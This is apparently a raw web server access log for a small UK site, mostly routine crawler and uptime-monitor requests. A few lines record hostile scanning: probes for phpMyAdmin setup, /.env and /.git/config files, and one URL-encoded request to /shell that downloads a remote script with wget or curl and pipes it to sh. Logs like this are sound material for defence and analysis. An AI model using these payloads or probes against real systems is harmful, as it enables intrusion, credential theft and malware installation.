112.124.71.153 - - [17/Jul/2025:21:46:32 +0000] "GET http://51.89.169.208:80/phpmyadmin/scripts/setup.php HTTP/1.0" 301 245 "-" "-"
66.249.70.137 - - [17/Jul/2025:21:47:21 +0000] "GET /business/greater-manchester.html HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.128.242.218 - - [17/Jul/2025:21:47:51 +0000] "GET /.env HTTP/1.1" 301 234 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
178.128.242.218 - - [17/Jul/2025:21:47:51 +0000] "GET /.git/config HTTP/1.1" 301 241 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
216.144.248.30 - - [17/Jul/2025:21:48:17 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:49:03 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:49:13 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:49:16 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
45.135.194.11 - - [17/Jul/2025:21:49:27 +0000] "GET /shell?%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%29%7Csh%3B HTTP/1.1" 301 428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
216.144.248.23 - - [17/Jul/2025:21:53:20 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:53:30 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:53:31 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
